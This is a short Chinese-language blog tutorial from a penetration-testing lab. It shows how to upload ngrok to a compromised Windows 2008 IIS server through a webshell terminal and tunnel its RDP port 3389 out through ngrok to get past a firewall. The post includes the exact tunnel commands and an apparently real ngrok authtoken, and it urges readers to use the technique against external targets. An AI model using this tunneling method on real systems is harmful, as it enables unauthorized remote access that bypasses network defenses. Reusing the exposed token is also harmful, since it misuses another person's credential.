Ngrok 內網端口轉發紀錄

Ngrok 內網端口轉發紀錄

作者 : Noth

前言 : 

筆者在滲透的過程中,常常發現例如有開 3389 Port 有開,但不管如何自己都沒辦法進行 RDP,到後面才請教大神朋友,原來阿 ! 3389 Port 有可能只對內連不對外連,又或者有防火牆擋住,這時可以拿出一個神器 ngrok 進行端口轉發到外網 xD,進一步在去連接 !! 巧妙如斯~ 直接實作一次。


介紹 : 

可以把外界的請求轉發到你本機指定的 Port ,也就是由 ngrok 產生一串公開的網址來讓外網存取你本機上的 Port,用來進行端口轉發,亦可用來滲透,是一個不錯的工具。


實作環境 :

攻擊者 :  192.168.111.130 ( Windows 10,內網)

受害者 :  192.168.111.131 (iis apppool\defaultapppool,Windows 2008,內網)


實作流程 :

先在 ngrok 官網下載 windows 版本 

上傳 ngrok 到 C:/Windows/Temp 目錄下 : 

在蟻劍 Terminal 執行端口轉發 : 

ngrok64.exe authtoken 1ttRd9isTu7y8MOKc6UNbwLuhcQ_2MvLppdeUXGCgvuNnKRSY

ngrok64.exe tcp 3389

此時 ngrok tunnel 已經建立,接下來利用 mstsc 遠端連接

成功連接 :

 

接下來交給各位小夥伴去嘗試 xD  當然攻擊者入侵外網的時候也是相同的手法進行端口轉發,多實戰 ....  多實戰 .... 



留言

熱門文章